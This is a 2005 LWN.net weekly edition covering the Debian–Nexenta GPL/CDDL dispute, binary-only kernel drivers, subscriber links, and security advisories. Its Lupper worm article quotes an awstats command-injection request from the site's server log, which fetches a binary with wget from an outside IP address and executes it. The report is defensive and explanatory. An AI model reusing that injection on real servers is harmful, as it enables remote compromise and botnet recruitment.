LWN.net Logo

LWN.net Weekly Edition for November 10, 2005

Debian and Nexenta collide

When Sun Microsystems decided to release Solaris under the CDDL license, it did so with the knowledge that this code could not be combined with GPL-licensed code. That incompatibility was pretty much guaranteed to create some interesting conflicts at some time. That time appears to have arrived, thanks to the release of Nexenta, a Debian-based system built on top of the Solaris kernel and runtime libraries. How this conflict is resolved may set the tone for how the GPL and CDDL worlds intersect in the future.

The Nexenta developers got off to a bit of a bad start by announcing its existence while putting its entire web site behind a password gate. Once general access was allowed, developers discovered that binaries of their software were being distributed without the associated source. The Nexenta developers responded in a rather unhelpful manner:

Also some stuff not committed yet, beca[u]se we are testing them. In 2-3 months we are hoping to sort out all these "starting" issues with code browsing, scripts availability, etc.

Anybody who has hung around anywhere near the Debian community for any period of time will know immediately that this sort of answer is unlikely to go over well. Various developers responded with requests to delete the binaries immediately, and some even pondered the use of a DMCA takedown notice. The Nexenta developers appear to have taken the hint, and source availability has improved, though the occasional glitch still comes to light.

The hardest issue, however, remains unresolved. The Nexenta project uses, along with the Solaris kernel, a number of user-space libraries (including the core C library) from Solaris. These libraries, being licensed under the CDDL, are not compatible with GPL-licensed applications. But much of Nexenta's user space is GPL licensed, and is linked against Sun's libc. And, in particular, much of the management infrastructure which makes Nexenta a Debian-derived distribution is built this way.

Several Debian developers are claiming that distributing GPL-licensed applications linked to a CDDL libc constitutes copyright infringement and should be stopped. The Nexenta developers, instead, justify this distribution by citing the "system software" exemption in section 3 of the GPL:

However, as a special exception, the source code distributed need not include anything that is normally distributed (in either source or binary form) with the major components (compiler, kernel, and so on) of the operating system on which the executable runs, unless that component itself accompanies the executable.

This exemption has allowed the distribution of, for example, binaries of GPL applications for Solaris for many years. The Debian folks respond that this situation is different: since the libraries and the GPL applications are all part of the Nexenta distribution, the CDDL-licensed libc does, indeed, accompany the executable, and the exemption does not apply.

The Nexenta developers do not appear to entirely buy this argument. They have suggested, however, that Nexenta could be split into two pieces: the CDDL-licensed core, and the GPL-licensed applications. Once the core is installed, the applications could be brought in from a repository somewhere. The only problem there is that bringing in those applications requires the use of (GPL-licensed) tools like dpkg, which would thus have to be distributed with the core system. Getting past this little bootstrap issue could be a challenge.

Once again, Nexenta has not helped itself here: project developers have suggested that the Debian community might want to help them out by relicensing dpkg under CDDL-compatible terms. Suffice to say that this idea was not received enthusiastically. The idea of rewriting dpkg as a CDDL application has also been raised, though that raises some issues of its own.

A more plausible solution to this problem might be to get Sun to relicense its libraries in a GPL-compatible way. Nobody has asked Sun (publicly, at least) whether it would be willing to take this step, but, once again, Sun was certainly aware of the consequences of its licensing decisions when it made them. This situation could also be resolved by porting the GNU C library to the Solaris kernel and shipping it with Nexenta. This is evidently a big task, and the Nexenta developers (who seem to be fairly small in number) are not thrilled about taking it on.

The licensing issues are real, and need to be worked out. But many of the people involved in the debate appear to have lost track of the fact that the Nexenta project, while perhaps being occasionally arrogant and ignorant of how Debian does things, is trying to make a contribution to the free software world. It is a free software project. Anthony Towns has been almost the lone voice in calling for a higher degree of cooperation with Nexenta:

I'm amazed at the level of intolerance that's greeting a pretty major contribution to the free software community. There are, what, five major OS/kernels for PCs/workstations these days -- Windows, OS X, Solaris, BSD and Linux. How does it make any sense at all to be hostile to the fact that now four out of those five are free at their core?

He also points out that Debian's hands have not always been 100% clean, and that there is more to gain by helping a project like this toward free-software purity than by threatening legal action against it. With luck, the community will hear this message. What Nexenta is doing is very much within the spirit of free software licensing; with patience and help, they should be able to get within the letter of those licenses as well.

Comments (84 posted)

On binary drivers and stable interfaces

There has recently been a surge of discussion, once again, on whether the Linux kernel should support closed-source drivers. The debate was driven, perhaps, by the suspicion (later put to rest) that OSDL was supporting the creation of a stable binary driver ABI for Linux. So perhaps the time has come to review the reasons why the kernel developers are opposed to closed-source drivers. Our apologies to all of you who have seen this before.

Support for binary-only drivers seems, on the surface, like it could be a good idea. Companies could provide Linux drivers for their hardware without exposing their "valuable intellectual property" to the world. Users would have a higher degree of assurance that their hardware would simply work. All of the current hardware hassles would go away, and everybody would be happy. What could be wrong with that?

One obvious problem is that, with a proprietary driver, a Linux system loses one of its best characteristics: independence from vendors. A user of a proprietary driver depends on the vendor for fixes and updates, but the vendor is under no obligation to provide them. Computing hardware has a notoriously short product life; if the vendor drops driver support when a product hits the end of its life, there is little that a user can do. If the vendor goes out of business, there will be no further support for the driver. If the vendor decides to start charging for driver updates, the user has little option but to pull out the wallet. If the driver has a bug which affects the stability of the system, only the vendor can fix it.

And history shows that proprietary drivers tend to have plenty of bugs. They are often written by developers with little time and even less expertise with the Linux kernel. The code does not go through any sort of peer review, so obvious problems will persist into the final product. And, since only the vendor can fix the driver, bugs can last for a long time.

Binary drivers are brittle. The kernel API can and does change; that aspect of the kernel is not going away. Freezing an API would limit the developers' ability to fix poor interfaces, improve how the kernel works, and remove cruft. So binary drivers will always be likely to break between kernel releases, and users will have to wait for the vendor to get around to catching up with the current API.

Linux kernel developers will not help users who have proprietary drivers loaded into their systems. That is not because the developers want to be petty and vengeful (well, perhaps one or two of them do); it is simply that the developers have no way to track down problems when closed-source code is running.

Even if a vendor offers top-quality drivers and support, it is unlikely that said vendor supports all of the architectures that run Linux. Freedom to run on something other than i386 is one of the great advantages of Linux; proprietary code takes that freedom away.

Finally, proprietary drivers may constitute copyright infringement. Certainly some developers feel that kernel modules are derived products of the kernel itself, and thus required to carry the kernel's (GPL) license. Whether the module interface constitutes a boundary which the GPL cannot cross can only, in the end, be determined by the courts. Until then, every proprietary driver carries with it a degree of legal uncertainty.

None of this is new; here's what Linus Torvalds said back in 1999:

Basically, I want people to know that when they use binary-only modules, it's THEIR problem. I want people to know that in their bones, and I want it shouted out from the rooftops. I want people to wake up in a cold sweat every once in a while if they use binary-only modules.

The alternative to cold sweats is to stick with hardware which comes with free drivers. In most areas, finding such hardware is not a challenge. In the cases where it can be a problem (video adapters, some wireless network cards), the solution is not to weigh down the kernel with some sort of set-in-stone ABI. As Linux continues to grow in popularity - and proprietary drivers get harder to write and maintain - recalcitrant vendors should eventually come around. That's exactly what has tended to happen thus far.

Comments (37 posted)

A quick update on subscriber links

As we noted last week, the "subscriber link" feature is now active on the site. With these links, a subscriber can hand out "get in free" tickets to specific subscriber-only articles. To do so, you need only pull up the article (if you are reading it in the Weekly Edition, click on the "comments" link at the bottom to get there) and use the "send a link" option in the left column.

Initially the feature was only made available to "project leader" subscribers. Based on the feedback we have received (and the original plan, in any case), subscriber links are now available to all subscribers. We will continue to think of ways to make added features available to the higher-level subscribers, but this feature did not seem like the right one to use this way.

An unanticipated side benefit of this feature has already become clear. By looking at the list of outstanding subscriber links, we can quickly see which of our articles are considered sufficiently interesting to make links for. That is a level of feedback we didn't have before. For the curious, last week's winners were A study on free software in British schools and Sony, rootkits, and the escalation of the DRM war.

Finally, we'll note that readers coming in on a subscriber link may now be presented with a tasteful pitch for LWN subscriptions. Happily, our initial plans for a Flash-based, popup ad were abandoned after a few milliseconds worth of thought. Hopefully the use of subscriber links will eventually lead to more subscribers for LWN. Meanwhile, please enjoy the feature, and we thank you for helping us to design it.

Comments (7 posted)

Page editor: Jonathan Corbet

Security

The Lupper worm

Security companies and Linux critics worldwide have been happy to proclaim the existence of the "Lupper" worm, the first Linux-based worm to hit the net in years. This worm gets into systems by way of the various PHP XML-RPC vulnerabilities which have been reported (and fixed) over the last year. Infected systems, apparently, become part of a distributed bot net, waiting for somebody to tell them what to do.

According to McAfee's Lupper page, there are a couple of signs of infection: processes listening on UDP ports 7111 and 7222, and a /tmp/lupii file. Attempted infections can be seen in the web server logs; they look something like either of following:

    GET /awstats/awstats.pl?configdir=|echo;echo YYY; \
        cd /tmp;wget 24.224.174.18/listen;chmod +x listen; \
        ./listen 216.102.212.115;echo YYY;echo|
    POST /drupal/xmlrpc.php

(The first line has been broken up, and %-escapes have been replaced for readability).

The above lines were taken directly from the LWN.net server log. Thus far, our server has bravely fended off Lupper attacks from all of five different sources. So it looks like the attack of the Lupper worm is unlikely to bring down the net as a whole.

In fact, it would be easy to write off this worm altogether. It attacks vulnerabilities which few systems had in the first place. Said vulnerabilities were disclosed - and fixed - months ago. Even Fedora Legacy - which has not produced an update since September 15 - managed to get a fix out for this problem. Any system whose administrator applies security updates will not have been affected by this particular worm. Most administrators need not go into red-alert status over this one.

That said, it behooves us to notice that Lupper is, indeed, a Linux worm propagating in the wild. Any of us who feel that, because we are running Linux, we are immune from worms and other such annoyances have just received a gentle warning. Someday, somebody will write a worm which exploits a vulnerability which is widespread and which has not been known for months. Indeed, they might happen upon a hole which has not been disclosed at all. On that day, we may all find ourselves feeling rather less smug.

Comments (24 posted)

Brief items

Remote vulnerability in clamav

For those of you running clamav on your mail streams: a remote code execution vulnerability has been disclosed in this package. Exploits in the near future would not be a surprising development. Upgrade to version 0.87.1 for the fix, or apply the distributor updates sure to come soon. Click below for the advisory.

Full Story (comments: none)

New vulnerabilities

chmlib: several vulnerabilities

Package(s):chmlib CVE #(s):CVE-2005-2659 CVE-2005-2930 CVE-2005-3318
Created:November 7, 2005 Updated:November 28, 2005
Description: Several vulnerabilities have been discovered in chmlib, a library for dealing with CHM format files.
Alerts:
Gentoo 200511-23 2005-11-28
Debian DSA-886-1 2005-11-07

Comments (none posted)

clamav: multiple vulnerabilities

Package(s):clamav CVE #(s):CVE-2005-3239 CVE-2005-3500 CVE-2005-3501 CVE-2005-3303
Created:November 7, 2005 Updated:November 9, 2005
Description: Multiple security holes were found in clamav that may allow attackers to cause a denial of service, memory corruption and execution of arbitrary code.
Alerts:
Mandriva MDKSA-2005:205 2005-11-07
Debian DSA-887-1 2005-11-07
Gentoo 200511-04 2005-11-06
Debian-Testing DTSA-21-1 2005-11-03

Comments (none posted)

gpsdrive: format string vulnerability

Package(s):gpsdrive CVE #(s):CVE-2005-3523
Created:November 9, 2005 Updated:November 9, 2005
Description: The gpsdrive navigation system contains a format string vulnerability which could be exploited to execute arbitrary code.
Alerts:
Debian DSA-891-1 2005-11-09

Comments (none posted)

horde3: design error

Package(s):horde3 CVE #(s):CVE-2005-3344
Created:November 7, 2005 Updated:November 9, 2005
Description: Mike O'Connor discovered that the default installation of Horde3 on Debian includes an administrator account without a password. Already configured installations will not be altered by this update.
Alerts:
Debian DSA-884-1 2005-11-07

Comments (none posted)

libungif: memory corruption

Package(s):libungif CVE #(s):CAN-2005-2974
Created:November 3, 2005 Updated:March 20, 2006
Description: The libungif library has a vulnerability in the GIF file colormap handling code. A maliciously crafted GIF file can cause out of bounds memory writing and register corruption.
Alerts:
Fedora-Legacy FLSA:174479 2006-03-16
SuSE SUSE-SR:2005:026 2005-11-11
Mandriva MDKSA-2005:207 2005-11-09
Debian DSA-890-1 2005-11-09
Ubuntu USN-214-1 2005-11-07
Gentoo 200511-03 2005-11-04
Red Hat RHSA-2005:828-01 2005-11-03
Fedora FEDORA-2005-1046 2005-11-03
Fedora FEDORA-2005-1045 2005-11-03

Comments (none posted)

php: multiple vulnerabilities

Package(s):php CVE #(s):CVE-2005-3390 CVE-2005-3389 CVE-2005-3388 CVE-2005-3353
Created:November 8, 2005 Updated:December 23, 2005
Description: There are multiple vulnerabilities in PHP, including malicious requests may overwrite the GLOBALS array, the parse_str() function may enable the register_globals setting, cross-site scripting bugs in phpinfo() and a bug in EXIF image parsing that may crash the process.
Alerts:
Ubuntu USN-232-1 2005-12-23
SuSE SUSE-SA:2005:069 2005-12-14
SuSE SUSE-SR:2005:029 2005-12-09
OpenPKG OpenPKG-SA-2005.027 2005-12-03
Fedora-Legacy FLSA:166943 2005-11-28
Mandriva MDKSA-2005:213 2005-11-16
Gentoo 200511-08 2005-11-13
Red Hat RHSA-2005:838-01 2005-11-10
Red Hat RHSA-2005:831-01 2005-11-10
Fedora FEDORA-2005-1061 2005-11-08
Fedora FEDORA-2005-1062 2005-11-08

Comments (none posted)

pwdutils: privilege escalation

Package(s):pwdutils shadow CVE #(s):
Created:November 4, 2005 Updated:November 9, 2005
Description: Thomas Gerisch found that the setuid 'chfn' program contained in the pwdutils suite insufficiently checks it's arguments when changing the GECOS field. This bug leads to a trivially exploitable local privilege escalation that allows users to gain root access.
Alerts:
SuSE SUSE-SA:2005:064 2005-11-04

Comments (none posted)

spamassassin: denial of service

Package(s):spamassassin CVE #(s):CVE-2005-3351
Created:November 9, 2005 Updated:March 7, 2006
Description: Spamassassin through version 3.0.4 can be made to dump core if a message arrives with too many addresses in the To: field.
Alerts:
Red Hat RHSA-2006:0129-01 2006-03-07
Mandriva MDKSA-2005:221 2005-12-02
Fedora FEDORA-2005-1066 2005-11-09
Fedora FEDORA-2005-1065 2005-11-09

Comments (none posted)

sylpheed: buffer overflow

Package(s):sylpheed CVE #(s):CVE-2005-3354
Created:November 9, 2005 Updated:January 6, 2006
Description: The sylpheed mail client, prior to versions 1.0.6 and 2.0.4, contains a buffer overflow in the LDIF address book import code.
Alerts:
Debian DSA-908-1 2005-11-23
Debian DSA-906-1 2005-11-22
Gentoo 200511-13 2005-11-15
Fedora FEDORA-2005-1063 2005-11-09

Comments (none posted)

thttpd: insecure temp file

Package(s):thttpd CVE #(s):CVE-2005-3124
Created:November 4, 2005 Updated:November 9, 2005
Description: Javier Fernández-Sanguino Peña from the Debian Security Audit team discovered that the syslogtocern script from thttpd, a tiny webserver, uses a temporary file insecurely, allowing a local attacker to craft a symlink attack to overwrite arbitrary files.
Alerts:
Debian DSA-883-1 2005-11-04

Comments (none posted)

Updated vulnerabilities

a2ps: input validation error

Package(s):a2ps CVE #(s):CAN-2004-1170 CAN-2004-1377
Created:November 26, 2004 Updated:December 19, 2005
Description: The GNU a2ps utility fails to properly sanitize filenames, which can be abused by a malicious user to execute arbitrary commands with the privileges of the user running the vulnerable application. More information at Security Focus.
Alerts:
Fedora-Legacy FLSA:152870 2005-12-17
Mandriva MDKSA-2005:097 2005-06-07
OpenPKG OpenPKG-SA-2005.003 2005-01-17
Gentoo 200501-02 2005-01-04
Debian DSA-612-1 2004-12-20
Mandrake MDKSA-2004:140 2004-11-25

Comments (none posted)

abiword: buffer overflow

Package(s):abiword CVE #(s):CAN-2005-2964
Created:September 29, 2005 Updated:November 14, 2005
Description: The RTF import module of the AbiWord word processor has a buffer overflow vulnerability. A user can be tricked into opening a maliciously crafted RTF file, giving the attacker the ability to execute code with the permissions of the user.
Alerts:
Debian DSA-894-1 2005-11-14
Gentoo 200510-17 2005-10-20
Ubuntu USN-203-1 2005-10-13
Fedora FEDORA-2005-955 2005-09-30
Gentoo 200509-20 2005-09-30
Ubuntu USN-188-1 2005-09-29

Comments (none posted)

apache information disclosure if modssl=yes

Package(s):apache CVE #(s):CAN-2005-2700
Created:September 2, 2005 Updated:November 10, 2005
Description: An information disclosure vulnerability was discovered in mod_ssl, the SSL/TLS module of the Apache webserver. When "SSLVerifyClient optional" was configured in the global virtual host configuration, an "SSLVerifyClient require" in per-location context was not enforced.
Alerts:
Fedora-Legacy FLSA:166941 2005-11-09
Gentoo 200509-12 2005-09-19
SuSE SUSE-SA:2005:052 2005-09-12
Red Hat RHSA-2005:773-01 2005-09-15
Slackware SSA:2005-251-03 2005-09-14
Debian DSA-807-1 2005-09-12
Slackware SSA:2005-251-02 2005-09-09
Fedora FEDORA-2005-849 2005-09-07
Mandriva MDKSA-2005:161 2005-09-08
Fedora FEDORA-2005-848 2005-09-07
Debian DSA-805-1 2005-09-08
Ubuntu USN-177-1 2005-09-07
Red Hat RHSA-2005:608-01 2005-09-06
OpenPKG OpenPKG-SA-2005.017 2005-09-02

Comments (none posted)

httpd: off-by-one overflow and cross-site scripting

Package(s):apache httpd CVE #(s):CAN-2005-1268 CAN-2005-2088
Created:July 25, 2005 Updated:November 7, 2005
Description: Watchfire reported a flaw that occurred when using the Apache server as an HTTP proxy. A remote attacker could send an HTTP request with both a "Transfer-Encoding: chunked" header and a "Content-Length" header. This caused Apache to incorrectly handle and forward the body of the request in a way that the receiving server processes it as a separate HTTP request. This could allow the bypass of Web application firewall protection or lead to cross-site scripting (XSS) attacks.

Marc Stern reported an off-by-one overflow in the mod_ssl CRL verification callback. In order to exploit this issue the Apache server would need to be configured to use a malicious certificate revocation list (CRL).

Alerts:
Slackware SSA:2005-310-04 2005-11-07
Debian DSA-803-1 2005-09-08
Ubuntu USN-160-2 2005-09-07
SuSE SUSE-SA:2005:046 2005-08-16
Fedora-Legacy FLSA:157701 2005-08-10
Ubuntu USN-160-1 2005-08-04
Mandriva MDKSA-2005:130 2005-08-03
Mandriva MDKSA-2005:129 2005-08-03
Fedora FEDORA-2005-638 2005-08-02
Fedora FEDORA-2005-639 2005-08-02
Trustix TSLSA-2005-0038 2005-07-29
SuSE SUSE-SR:2005:018 2005-07-28
Red Hat RHSA-2005:582-01 2005-07-25

Comments (none posted)

awstats: command injection vulnerability

Package(s):awstats CVE #(s):CAN-2005-1527
Created:August 11, 2005 Updated:November 10, 2005
Description: AWStats has a command injection vulnerability that can be exploited by specially crafting referrer URLs that contain Perl code. The code can then be executed with the privileges of the web server.
Alerts:
Debian DSA-892-1 2005-11-10
Gentoo 200508-07 2005-08-16
Ubuntu USN-167-1 2005-08-11

Comments (2 posted)

bzip2: race condition and infinite loop

Package(s):bzip2 CVE #(s):CAN-2005-0953 CAN-2005-1260
Created:May 17, 2005 Updated:January 10, 2007
Description: A race condition in bzip2 1.0.2 and earlier allows local users to modify permissions of arbitrary files via a hard link attack on a file while it is being decompressed, whose permissions are changed by bzip2 after the decompression is complete. Also specially crafted bzip2 archives may cause an infinite loop in the decompressor.
Alerts:
rPath rPSA-2007-0004-1 2007-01-09
Debian DSA-741-1 2005-07-07
Red Hat RHSA-2005:474-01 2005-06-16
OpenPKG OpenPKG-SA-2005.008 2005-06-10
SuSE SUSE-SR:2005:015 2005-06-07
Debian DSA-730-1 2005-05-27
Mandriva MDKSA-2005:091 2005-05-18
Ubuntu USN-127-1 2005-05-17

Comments (2 posted)

common-lisp-controller: design error

Package(s):common-lisp-controller CVE #(s):CAN-2005-2657
Created:September 14, 2005 Updated:November 21, 2005
Description: François-René Rideau discovered a bug in common-lisp-controller, a Common Lisp source and compiler manager, that allows a local user to compile malicious code into a cache directory which is executed by another user if that user has not used Common Lisp before.
Alerts:
Debian DSA-811-2 2005-11-21
Debian DSA-811-1 2005-09-14

Comments (none posted)

cpio: directory traversal

Package(s):cpio CVE #(s):CAN-2005-1111
Created:June 20, 2005 Updated:December 26, 2005
Description: There is a vulnerability in cpio (2.6 and previous) that allows a malicious cpio file to extract to an arbitrary directory of the attackers choice. cpio will extract to the path specified in the cpio file, this path can be absolute.
Alerts:
Mandriva MDKSA-2005:237 2005-12-23
Red Hat RHSA-2005:806-01 2005-11-10
Debian DSA-846-1 2005-10-07
Ubuntu USN-189-1 2005-09-29
Red Hat RHSA-2005:378-01 2005-07-21
Mandriva MDKSA-2005:116-1 2005-07-19
Mandriva MDKSA-2005:116 2005-07-11
Trustix TSLSA-2005-0030 2005-06-24
Gentoo 200506-16 2005-06-20

Comments (1 posted)

curl/wget: NTLM username buffer overflow

Package(s):curl wget CVE #(s):CAN-2005-3185
Created:October 14, 2005 Updated:November 7, 2005
Description: A vulnerability in libcurl's NTLM function can overflow a stack-based buffer if given too long a user name or domain name in NTLM authentication is enabled and either a) pass a user and domain name to libcurl that together are longer than 192 bytes or b) allow (lib)curl to follow HTTP redirects and the new URL contains a URL with a user and domain name that together are longer than 192 bytes. See this iDEFENSE Labs advisory for more details.
Alerts:
Slackware SSA:2005-310-01 2005-11-07
Red Hat RHSA-2005:812-00 2005-11-02
Red Hat RHSA-2005:807-00 2005-11-02
SuSE SUSE-SA:2005:063 2005-10-24
Gentoo 200510-19 2005-10-22
Fedora FEDORA-2005-1000 2005-10-18
Fedora FEDORA-2005-996 2005-10-17
Ubuntu USN-205-1 2005-10-14
Mandriva MDKSA-2005:183 2005-10-13
Mandriva MDKSA-2005:182 2005-10-13

Comments (none posted)

cyrus-imapd: buffer overflows

Package(s):cyrus-imapd CVE #(s):CAN-2005-0546
Created:February 23, 2005 Updated:April 10, 2006
Description: Cyrus-imapd, prior to version 2.2.12, contains several buffer overflows which could be exploited by an (authenticated) attacker to run code on the server system.
Alerts:
Fedora-Legacy FLSA:156290 2006-04-04
Red Hat RHSA-2005:408-01 2005-05-17
Fedora FEDORA-2005-339 2005-04-27
OpenPKG OpenPKG-SA-2005.005 2005-04-05
Conectiva CLA-2005:937 2005-03-17
Mandrake MDKSA-2005:051 2005-03-04
Ubuntu USN-87-1 2005-02-28
SuSE SUSE-SA:2005:009 2005-02-24
Gentoo 200502-29 2005-02-23

Comments (none posted)

dia: missing input sanitizing

Package(s):dia CVE #(s):CAN-2005-2966
Created:October 4, 2005 Updated:April 6, 2006
Description: Joxean Koret discovered that the SVG import plugin did not properly sanitize data read from an SVG file. By tricking an user into opening a specially crafted SVG file, an attacker could exploit this to execute arbitrary code with the privileges of the user.
Alerts:
Debian DSA-1025-1 2006-04-06
Mandriva MDKSA-2005:187 2005-10-20
Gentoo 200510-06 2005-10-06
Debian DSA-847-1 2005-10-08
SuSE SUSE-SR:2005:022 2005-10-07
Ubuntu USN-193-1 2005-10-04

Comments (none posted)

elm: buffer overflow

Package(s):elm CVE #(s):CAN-2005-2665
Created:August 23, 2005 Updated:November 11, 2005
Description: A buffer overflow flaw in Elm was discovered that was triggered by viewing a mailbox containing a message with a carefully crafted 'Expires' header. An attacker could create a malicious message that would execute arbitrary code with the privileges of the user who received it.
Alerts:
Slackware SSA:2005-311-01 2005-11-08
Red Hat RHSA-2005:755-01 2005-08-23

Comments (none posted)

emacs21: format string vulnerability in "movemail"

Package(s):emacs21 CVE #(s):CAN-2005-0100
Created:February 7, 2005 Updated:May 15, 2006
Description: Max Vozeler discovered a format string vulnerability in the "movemail" utility of Emacs. By sending specially crafted packets, a malicious POP3 server could cause a buffer overflow, which could be exploited to execute arbitrary code with the privileges of the user and the "mail" group.
Alerts:
Fedora-Legacy FLSA:152898 2006-05-12
Debian DSA-685-1 2005-02-17
Mandrake MDKSA-2005:038 2005-02-15
Gentoo 200502-20 2005-02-15
Fedora FEDORA-2005-146 2005-02-14
Fedora FEDORA-2005-145 2005-02-14
Red Hat RHSA-2005:133-01 2005-02-15
Red Hat RHSA-2005:110-01 2005-02-15
Red Hat RHSA-2005:134-01 2005-02-10
Red Hat RHSA-2005:112-01 2005-02-10
Fedora FEDORA-2005-116 2005-02-08
Fedora FEDORA-2005-115 2005-02-08
Debian DSA-671-1 2005-02-08
Debian DSA-670-1 2005-02-08
Ubuntu USN-76-1 2005-02-07

Comments (none posted)

enigmail: information disclosure

Package(s):enigmail CVE #(s):CVE-2005-3256
Created:October 20, 2005 Updated:December 13, 2005
Description: The key selection dialog from the Mozilla Thunderbird enigmail plugin has an information disclosure vulnerability. A key with an empty user id from a user's keyring will be used by default, allowing a message to be decrypted. This can lead to an unauthorized information disclosure.
Alerts:
Mandriva MDKSA-2005:226 2005-12-12
Debian DSA-889-1 2005-11-08
Ubuntu USN-211-1 2005-10-20

Comments (none posted)

enscript: arbitrary code execution

Package(s):enscript CVE #(s):CAN-2004-1184 CAN-2004-1185 CAN-2004-1186
Created:January 21, 2005 Updated:May 27, 2006
Description: Erik Sjölund has discovered several security relevant problems in enscript, a program to convert ASCII text into Postscript and other formats. Unsanitized input can cause the execution of arbitrary commands via EPSF pipe support. Due to missing sanitizing of filenames it is possible that a specially crafted filename can cause arbitrary commands to be executed. Multiple buffer overflows can cause the program to crash.
Alerts:
rPath rPSA-2006-0083-1 2006-05-26
Fedora-Legacy FLSA:152892 2005-12-17
Red Hat RHSA-2005:040-01 2005-02-15
Mandrake MDKSA-2005:033 2005-02-10
Gentoo 200502-03 2005-02-02
Red Hat RHSA-2005:039-01 2005-02-01
Fedora FEDORA-2005-096 2005-01-31
Fedora FEDORA-2005-092 2005-01-28
Fedora FEDORA-2005-091 2005-01-28
Fedora FEDORA-2005-016 2005-01-26
Fedora FEDORA-2005-015 2005-01-26
Ubuntu USN-68-1 2005-01-24
Debian DSA-654-1 2005-01-21

Comments (none posted)

ethereal: multiple vulnerabilities

Package(s):ethereal CVE #(s):CVE-2005-3241 CVE-2005-3242 CVE-2005-3243 CVE-2005-3244 CVE-2005-3245 CVE-2005-3246 CVE-2005-3247 CVE-2005-3248 CVE-2005-3249 CVE-2005-3184
Created:October 25, 2005 Updated:January 10, 2006
Description: A number of security flaws have been discovered in Ethereal. On a system where Ethereal is running, a remote attacker could send malicious packets to trigger these flaws and cause Ethereal to crash or potentially execute arbitrary code.
Alerts:
Fedora-Legacy FLSA:152922 2006-01-09
Mandriva MDKSA-2005:193-2 2005-10-31
Gentoo 200510-25 2005-10-30
Mandriva MDKSA-2005:193-1 2005-10-26
Mandriva MDKSA-2005:193 2005-10-25
Red Hat RHSA-2005:809-01 2005-10-25

Comments (none posted)

evolution: format string issues

Package(s):evolution CVE #(s):CAN-2005-2549 CAN-2005-2550
Created:August 15, 2005 Updated:March 23, 2006
Description: Evolution has format string issues. SITIC advisory SA05-001 contains more information.
Alerts:
Debian DSA-1016-1 2006-03-23
SuSE SUSE-SA:2005:054 2005-09-16
Red Hat RHSA-2005:267-01 2005-08-29
Gentoo 200508-12 2005-08-23
Mandriva MDKSA-2005:141 2005-08-17
Fedora FEDORA-2005-742 2005-08-11
Fedora FEDORA-2005-743 2005-08-11

Comments (2 posted)

fetchmailconf: insecure file creation

Package(s):fetchmail CVE #(s):CVE-2005-3088
Created:October 26, 2005 Updated:November 22, 2005
Description: The fetchmailconf utility can create files which are world-readable for a brief period. These files may contain passwords, and thus should not be created in this manner.
Alerts:
Debian DSA-900-3 2005-11-22
Debian DSA-900-2 2005-11-21
Debian DSA-900-1 2005-11-18
Mandriva MDKSA-2005:209 2005-11-09
Ubuntu USN-215-1 2005-11-07
Gentoo 200511-06 2005-11-06
Red Hat RHSA-2005:823-01 2005-10-26

Comments (none posted)

firefox: multiple vulnerabilities

Package(s):firefox CVE #(s):CAN-2005-2701 CAN-2005-2702 CAN-2005-2703 CAN-2005-2704 CAN-2005-2705 CAN-2005-2706 CAN-2005-2707 CAN-2005-2968
Created:September 22, 2005 Updated:February 15, 2006
Description: The Firefox browser has multiple vulnerabilities including problems with XBM image file processing, Unicode sequence processing, XMLHttp requests, malicious XBL binding, a JavaScript engine buffer overflow, about: pages, opening of new windows, and command line URL processing.
Alerts:
Slackware SSA:2006-045-02 2006-02-15
Fedora-Legacy FLSA:168375 2006-01-09
Ubuntu USN-200-1 2005-10-11
Ubuntu USN-155-3 2005-10-04
Debian DSA-838-1 2005-10-02
Gentoo GLSA 200509-11:02 2005-09-18
SuSE SUSE-SA:2005:058 2005-09-30
Mandriva MDKSA-2005:170 2005-09-26
Mandriva MDKSA-2005:169 2005-09-26
Slackware SSA:2005-269-01 2005-09-26
Fedora FEDORA-2005-934 2005-09-26
Fedora FEDORA-2005-933 2005-09-26
Fedora FEDORA-2005-932 2005-09-26
Fedora FEDORA-2005-931 2005-09-26
Fedora FEDORA-2005-930 2005-09-26
Fedora FEDORA-2005-929 2005-09-26
Fedora FEDORA-2005-928 2005-09-26
Fedora FEDORA-2005-927 2005-09-26
Fedora FEDORA-2005-926 2005-09-26
Ubuntu USN-186-2 2005-09-25
Ubuntu USN-186-1 2005-09-23
Red Hat RHSA-2005:789-01 2005-09-22
Red Hat RHSA-2005:785-01 2005-09-22

Comments (none posted)

Foomatic: Arbitrary command execution in foomatic-rip

Package(s):foomatic CVE #(s):CAN-2004-0801
Created:September 20, 2004 Updated:May 31, 2006
Description: There is a vulnerability in the foomatic-filters package. This vulnerability is due to insufficient checking of command-line parameters and environment variables in the foomatic-rip filter. This vulnerability may allow both local and remote attackers to execute arbitrary commands on the print server with the permissions of the spooler.
Alerts:
SuSE SUSE-SA:2006:026 2006-05-30
Fedora-Legacy FLSA:2076 2004-11-05
Conectiva CLA-2004:880 2004-10-27
Fedora FEDORA-2004-303 2004-09-21
Gentoo 200409-24 2004-09-20

Comments (none posted)

gaim: buffer overflow

Package(s):gaim CVE #(s):CAN-2005-2103
Created:August 10, 2005 Updated:February 27, 2006
Description: Gaim suffers from a heap-based buffer overflow which can be exploited via a hostile "away message" to execute arbitrary code.
Alerts:
Fedora-Legacy FLSA:158543 2006-02-25
Slackware SSA:2005-242-03 2005-08-31
Fedora FEDORA-2005-751 2005-08-17
Fedora FEDORA-2005-750 2005-08-17
Mandriva MDKSA-2005:139 2005-08-15
Gentoo 200508-06 2005-08-15
Ubuntu USN-168-1 2005-08-12
Red Hat RHSA-2005:589-01 2005-08-09

Comments (none posted)

gallery: privilege escalation

Package(s):gallery CVE #(s):CVE-2005-2596
Created:November 2, 2005 Updated:November 2, 2005
Description: The gallery system has a bug which can allow all PostNuke users full access to the gallery.
Alerts:
Debian DSA-879-1 2005-11-02

Comments (none posted)

gdb: multiple vulnerabilities

Package(s):gdb CVE #(s):CAN-2005-1704 CAN-2005-1705
Created:May 20, 2005 Updated:August 11, 2006
Description: Tavis Ormandy of the Gentoo Linux Security Audit Team discovered an integer overflow in the BFD library, resulting in a heap overflow. A review also showed that by default, gdb insecurely sources initialization files from the working directory. Successful exploitation would result in the execution of arbitrary code on loading a specially crafted object file or the execution of arbitrary commands.
Alerts:
Red Hat RHSA-2006:0354-01 2006-08-10
Red Hat RHSA-2006:0368-01 2006-07-20
Mandriva MDKSA-2005:215 2005-11-23
Fedora FEDORA-2005-1033 2005-10-27
Fedora FEDORA-2005-1032 2005-10-27
Red Hat RHSA-2005:801-01 2005-10-18
Red Hat RHSA-2005:763-01 2005-10-11
Red Hat RHSA-2005:709-01 2005-10-05
Red Hat RHSA-2005:673-01 2005-10-05
Red Hat RHSA-2005:659-01 2005-09-28
Fedora FEDORA-2005-498 2005-06-29
